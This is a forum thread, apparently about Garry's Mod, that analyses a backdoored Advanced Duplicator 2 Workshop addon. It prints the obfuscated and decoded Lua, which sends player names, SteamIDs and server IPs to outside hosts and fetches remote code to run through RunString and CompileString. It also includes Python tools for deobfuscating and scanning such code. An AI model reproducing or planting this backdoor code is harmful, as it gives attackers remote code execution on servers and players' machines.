Another workshop backdoor :/

The backdoor is he

The backdoor is in autorun/client/cl_connector.lua


hf674f = string.char(104,116,116,112,58,47,47,119,119,119,46,103,97,109,101,115,101,114,118,101,114,101,110,102,111,114,99,101,114,46,99,111,109,47,97,112,105,47)
fg7jh9 = string.char(115,112,46,112,104,112)
local dh271f = _G[string.char(116,105,109,101,114)][string.char(83,105,109,112,108,101)]
local dh272f = _G[string.char(104,116,116,112)][string.char(80,111,115,116)]
dh271f(15, function()
	local clientIP = "0.0.0.0:0"
	local sendTbl2 = {
		sn = LocalPlayer():Nick(),
		sid = LocalPlayer():SteamID(),
		ip = clientIP
	}
	if(game.SinglePlayer()) then
		dh272f(hf674f..fg7jh9, sendTbl2 )
	else return nil
	end
end)string.char(59)

Has two workshop addons so presumably that's backdoored too.

These are people who were known to be using this

Some logs of spam.

is that all?
[lua]
timer.Simple( 15, function()
	local clientIP = "0.0.0.0:0"
	local sendTbl2 = {
		sn = LocalPlayer():Nick(),
		sid = LocalPlayer():SteamID(),
		ip = clientIP
	}
	if ( game.SinglePlayer() ) then
		http.Post( "http://www.gameserverenforcer.com/api/sp.php", sendTbl2 )
	else
		return nil
	end
end )
[/lua]
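The decoding done by hand above (folding every string.char(...) call back into a literal, resolving the _G["timer"]["Simple"] style lookups and the throwaway alias names) is mechanical, so here is an added Python script that does it automatically. It is not code from the thread or from the addon; it is a heuristic regex pass that only handles the obfuscation patterns seen in this file (string.char, _G indexing, top-level aliases, string concatenation), and the constructed OBFUSCATED sample is a copy of the snippet quoted in the first post.

```python
import re

# Constructed copy of the obfuscated cl_connector.lua snippet quoted earlier in
# this thread (the string.char() code points are the ones from the post).
OBFUSCATED = r'''hf674f = string.char(104,116,116,112,58,47,47,119,119,119,46,103,97,109,101,115,101,114,118,101,114,101,110,102,111,114,99,101,114,46,99,111,109,47,97,112,105,47)
fg7jh9 = string.char(115,112,46,112,104,112)
local dh271f = _G[string.char(116,105,109,101,114)][string.char(83,105,109,112,108,101)]
local dh272f = _G[string.char(104,116,116,112)][string.char(80,111,115,116)]
dh271f(15, function()
    local clientIP = "0.0.0.0:0"
    local sendTbl2 = {
        sn = LocalPlayer():Nick(),
        sid = LocalPlayer():SteamID(),
        ip = clientIP
    }
    if(game.SinglePlayer()) then
        dh272f(hf674f..fg7jh9, sendTbl2 )
    else return nil
    end
end)string.char(59)
'''

CHAR_CALL = re.compile(r'string\.char\(\s*([0-9,\s]+)\)')
GLOBAL_INDEX = re.compile(r'_G\["([A-Za-z_]\w*)"\]\["([A-Za-z_]\w*)"\]')
# Column-0 `name = "literal"` / `local name = some.global` lines: the alias layer.
ALIAS = re.compile(r'^(?:local\s+)?([A-Za-z_]\w*)[ \t]*=[ \t]*'
                   r'("(?:[^"\\]|\\.)*"|[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)*)[ \t]*$', re.M)
CONCAT = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\.\.\s*"((?:[^"\\]|\\.)*)"')
# A bare string literal right after a closing paren, i.e. string.char(59) -> ";".
STRAY_LITERAL = re.compile(r'(\))[ \t]*"[^"\n]*"[ \t]*$', re.M)


def lua_string_char(codes):
    """Equivalent of Lua's string.char: a list of byte values to text."""
    return ''.join(chr(c) for c in codes)


def fold_string_char(src):
    """Replace every string.char(n, n, ...) with an escaped Lua string literal."""
    def repl(m):
        codes = [int(c) for c in m.group(1).split(',') if c.strip()]
        text = lua_string_char(codes).replace('\\', '\\\\').replace('"', '\\"')
        return '"' + text + '"'
    return CHAR_CALL.sub(repl, src)


def fold_global_index(src):
    """_G["timer"]["Simple"] -> timer.Simple"""
    return GLOBAL_INDEX.sub(r'\1.\2', src)


def resolve_aliases(src):
    """Drop top-level alias assignments and substitute their values at every use."""
    aliases = {}

    def grab(m):
        aliases[m.group(1)] = m.group(2)
        return ''
    src = ALIAS.sub(grab, src)
    for name, value in aliases.items():
        # lambda so backslashes in the value are not treated as group references
        src = re.sub(r'\b' + re.escape(name) + r'\b', lambda m, v=value: v, src)
    return src


def fold_concat(src):
    """Constant-fold "a" .. "b" into "ab", repeating until nothing changes."""
    prev = None
    while prev != src:
        prev = src
        src = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src


def deobfuscate(src):
    src = fold_string_char(src)
    src = fold_global_index(src)
    src = resolve_aliases(src)
    src = fold_concat(src)
    src = STRAY_LITERAL.sub(r'\1', src)
    return src.lstrip('\n')


if __name__ == '__main__':
    print(deobfuscate(OBFUSCATED))
```

Running it prints the same readable timer.Simple / http.Post code as the manual decode above; the point of the script is that the same four passes can be run over every .lua file in an addon directory, and a file on which they change anything is one worth reading by hand.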

Pretty sure there's more, I'm just not looking, but the server that was being attacked runs all legit addons from scriptfodder which I verified, that's the only suspicious code on the server, and if it's only doing that, why obfuscate it? Pretty sure there's more in the addon.

advanced_duplicator_2_710427584\lua\autorun\client\cl_client_connector.lua
advanced_duplicator_2_710427584\lua\autorun\client\cl_connector.lua
advanced_duplicator_2_710427584\lua\autorun\server\advdupe2_sv_connector.lua

EDIT: done
[lua]
-- advanced_duplicator_2_710427584\lua\autorun\client\cl_connector.lua
timer.Simple( 15, function()
	local clientIP = "0.0.0.0:0"
	local sendTbl2 = {
		sn = LocalPlayer():Nick(),
		sid = LocalPlayer():SteamID(),
		ip = clientIP
	}
	if ( game.SinglePlayer() ) then
		http.Post( "http://www.gameserverenforcer.com/api/sp.php", sendTbl2 )
	else
		return nil
	end
end )

-- advanced_duplicator_2_710427584\lua\autorun\server\advdupe2_sv_connector.lua
timer.Create( "connect", 300, 0, function()
	http.Fetch( "http://www.gameserverenforcer.com/api/help.cfg", function( c ) RunString( c ) end )
end )
sendTbl = {
	sn = GetHostName(),
	playercount = tostring( #player.GetAll() ),
	ip = game.GetIPAddress()
}
timer.Simple( 15, function()
	if ( game.SinglePlayer() ) then
		return nil
	else
		http.Post( "http://www.gameserverenforcer.com/api/index.php", sendTbl )
	end
end )

-- advanced_duplicator_2_710427584\lua\autorun\client\cl_client_connector.lua
local function decoder( s )
	if string.len( s ) == 0 then return s end
	local sNew = ''
	for _ in string.gmatch( s, '..' ) do
		sNew = sNew .. string.char( bit.bxor( tonumber( _, 16 ), 9 ) )
	end
	return sNew
end
timer.Create( "dasdjalsdja", 10, 0, function()
	http.Post( "http://femboys.pw/bd/", { ["typ"] = "memed" }, function( code )
		local t = util.JSONToTable( code )
		if string.lower( type( t ) ) != "table" then return end
		local id = t["id"] or "noid"
		local time = tonumber( t["t"] )
		if os.time( os.date( "!*t" ) ) > time then return end
		if id == "all" or id == LocalPlayer():SteamID( LocalPlayer() ) then
			local func = CompileString( t["code"], ".", false ) or ""
			if isfunction( func ) then
				func()
			end
		end
	end,
	function () end )
end )
[/lua]

I can assure you none of the addons on my account have a backdoor.

:snip:

There’s another backdoor in this one. It’s hidden on the bottom of the file.

EDIT:
Looks like the author removed it from the workshop.

Link to the GMA

Removing the addon from workshop is basically admission of guilt :confused:

https://gyazo.com/45ad74654527bc0634f1453c26dd0a9f.jpg

Not sure why I got rated dumb, told ya guys there was more, just didn't find it as I had to go out.

As the title says, it only contained materials.

It's just pixels.

:speechless:
Have you learned nothing from neurotech?

Ha, such a pitiful excuse of a "backdoor", and I wonder where they got that idea from? Try harder next time.

Tracking/Linking SteamID, SteamName and player-IPs together. (It might show clientIP = "0.0.0.0:0" ... but he can still log the IP from his server.)



-- advanced_duplicator_2_710427584\lua\autorun\client\cl_connector.lua
timer.Simple( 15, function()
	local clientIP = "0.0.0.0:0"
	local sendTbl2 = {
		sn = LocalPlayer():Nick(),
		sid = LocalPlayer():SteamID(),
		ip = clientIP
	}
	if ( game.SinglePlayer() ) then 
		http.Post( "http://www.gameserverenforcer.com/api/sp.php", sendTbl2 )
	else
		return nil 
	end
end )

A backdoor connected to his server. Any lua he uploads to “http://www.gameserverenforcer.com/api/help.cfg” will be run.



-- advanced_duplicator_2_710427584\lua\autorun\server\advdupe2_sv_connector.lua
timer.Create( "connect", 300, 0, function()
	http.Fetch( "http://www.gameserverenforcer.com/api/help.cfg", function(c) RunString(c) end )
end )


A slightly more harmless tracker. It only sends server name, IP and playercount.



sendTbl = {
		sn = GetHostName(),
		playercount = tostring( #player.GetAll() ),
		ip = game.GetIPAddress()
}
timer.Simple( 15, function()
	if ( game.SinglePlayer() ) then 
		return nil
	else
		http.Post( "http://www.gameserverenforcer.com/api/index.php", sendTbl ) 
	end
end )

Allows him to run lua on clients by their steamID, from his server “femboys.pw”.



-- advanced_duplicator_2_710427584\lua\autorun\client\cl_client_connector.lua
timer.Create( "dasdjalsdja", 10, 0, function()
	http.Post( "http://femboys.pw/bd/", { ["typ"] = "memed" }, function( code )
		local t = util.JSONToTable( code )
		if string.lower( type( t ) ) != "table" then return end
		local id = t["id"] or "noid"
		local time = tonumber( t["t"] )
		if os.time( os.date( "!*t" ) ) > time then return end
		if id == "all" or id == LocalPlayer():SteamID( LocalPlayer() )then
			local func = CompileString( t["code"], ".", false ) or ""
			if isfunction( func ) then
				func()
			end
		end
	end,
	function () end )
end )

It fetches the HTTP endpoint every 10 seconds ... It can only be for malicious stuff when it updates that fast.
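The three behaviours called out in this post (a response body handed to RunString/CompileString, player identity or the server IP posted to an outside host, and a repeating timer polling an outside host) are all visible statically, so here is an added Python scanner that flags them in plain Lua source. It is not code from the thread or from the addon; it is a regex plus paren-matching heuristic, and the sample files are constructed copies of the decoded snippets from this thread plus one constructed benign version-check file to show what is not flagged. The kind labels, the 300 second beacon threshold and the benign file's URL are assumptions of this example.

```python
import re
from dataclasses import dataclass

# Constructed samples: the three decoded files from this thread (keyed by file
# name; full paths are under advanced_duplicator_2_710427584\lua\autorun\)
# plus one constructed benign file that fetches a URL without executing it.
SAMPLES = {
    'cl_connector.lua': '''timer.Simple( 15, function()
	local clientIP = "0.0.0.0:0"
	local sendTbl2 = { sn = LocalPlayer():Nick(), sid = LocalPlayer():SteamID(), ip = clientIP }
	if ( game.SinglePlayer() ) then
		http.Post( "http://www.gameserverenforcer.com/api/sp.php", sendTbl2 )
	else return nil end
end )''',
    'advdupe2_sv_connector.lua': '''timer.Create( "connect", 300, 0, function()
	http.Fetch( "http://www.gameserverenforcer.com/api/help.cfg", function( c ) RunString( c ) end )
end )
sendTbl = { sn = GetHostName(), playercount = tostring( #player.GetAll() ), ip = game.GetIPAddress() }
timer.Simple( 15, function()
	if ( game.SinglePlayer() ) then return nil else
		http.Post( "http://www.gameserverenforcer.com/api/index.php", sendTbl )
	end
end )''',
    'cl_client_connector.lua': '''timer.Create( "dasdjalsdja", 10, 0, function()
	http.Post( "http://femboys.pw/bd/", { ["typ"] = "memed" }, function( code )
		local t = util.JSONToTable( code )
		if string.lower( type( t ) ) != "table" then return end
		local id = t["id"] or "noid"
		if id == "all" or id == LocalPlayer():SteamID( LocalPlayer() ) then
			local func = CompileString( t["code"], ".", false ) or ""
			if isfunction( func ) then func() end
		end
	end, function () end )
end )''',
    'version_check.lua': '''-- constructed benign example: prints the response, never executes it
http.Fetch( "https://example.invalid/addon_version.txt", function( body )
	print( "latest version: " .. body )
end )''',
}

URL_RE = re.compile(r'https?://[^\s"\')]+')
HTTP_CALL_RE = re.compile(r'\bhttp\.(Fetch|Post)\s*\(')
TIMER_RE = re.compile(r'\btimer\.Create\s*\(\s*"[^"]*"\s*,\s*(\d+(?:\.\d+)?)\s*,\s*0\s*,')
CODE_SINKS = ('RunString', 'RunStringEx', 'CompileString')
IDENTITY_SOURCES = (':SteamID(', ':SteamID64(', ':Nick(', ':IPAddress(', 'game.GetIPAddress(')
BEACON_MAX_SECONDS = 300  # assumption: anything repeating this often or faster is a beacon


@dataclass
class Finding:
    path: str
    kind: str
    detail: str


def balanced(src, start, open_ch, close_ch):
    """Text from src[start] (an open delimiter) to its matching close delimiter."""
    depth = 0
    for i in range(start, len(src)):
        if src[i] == open_ch:
            depth += 1
        elif src[i] == close_ch:
            depth -= 1
            if depth == 0:
                return src[start:i + 1]
    return src[start:]


def posted_table(src, call):
    """Body of http.Post's second argument: an inline table, or a table assigned elsewhere in the file."""
    m = re.match(r'\(\s*"[^"]*"\s*,\s*', call)
    if not m:
        return ''
    rest = call[m.end():]
    if rest.startswith('{'):
        return balanced(rest, 0, '{', '}')
    name = re.match(r'[A-Za-z_]\w*', rest)
    defn = name and re.search(r'\b' + re.escape(name.group(0)) + r'\s*=\s*\{', src)
    return balanced(src, defn.end() - 1, '{', '}') if defn else ''


def scan_lua(path, src):
    findings = []
    for m in HTTP_CALL_RE.finditer(src):
        call = balanced(src, m.end() - 1, '(', ')')  # whole call incl. callbacks
        url = URL_RE.search(call)
        url_s = url.group(0) if url else '<dynamic url>'
        if any(sink in call for sink in CODE_SINKS):
            findings.append(Finding(path, 'remote-code-exec',
                                    f'http.{m.group(1)} callback feeds the response to a code sink ({url_s})'))
        if m.group(1) == 'Post' and any(s in posted_table(src, call) for s in IDENTITY_SOURCES):
            findings.append(Finding(path, 'identity-exfil', f'player/server identity posted to {url_s}'))
    urls = sorted(set(URL_RE.findall(src)))
    for t in TIMER_RE.finditer(src):
        if float(t.group(1)) <= BEACON_MAX_SECONDS and urls:
            findings.append(Finding(path, 'beacon', f'repeats every {t.group(1)}s and contacts {urls}'))
    return findings


def scan_samples():
    """Map of file name -> sorted finding kinds for the constructed samples."""
    return {p: sorted(f.kind for f in scan_lua(p, s)) for p, s in SAMPLES.items()}


if __name__ == '__main__':
    for p, s in SAMPLES.items():
        for f in scan_lua(p, s):
            print(f'{f.path}: [{f.kind}] {f.detail}')
```

The benign file uses http.Fetch exactly like the server connector does; what separates the two is only whether the callback hands the body to a code sink, which is the check worth keeping even if the URL allow-listing around it is tightened later.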

Looks like Moku and his friends are resorting to either paying or becoming friends in order to upload pathetic badly coded malicious lua to the workshop. The site femboys.pw will be made unavailable soon to stop any malicious activity.

This is also yet again another prime example of the same individuals unable to think of anything original themselves and have to steal concepts and ideas from others for their own personal gain.

Be warned we are coming for you next.

are u the real anonymous

Oh so how infantile your responses are. The concept of "anonymous" is completely and utterly stupid anyway, your attempts to demean me are pathetic, try harder, we are OE2016.

careful he is

ok

Aaand who is that?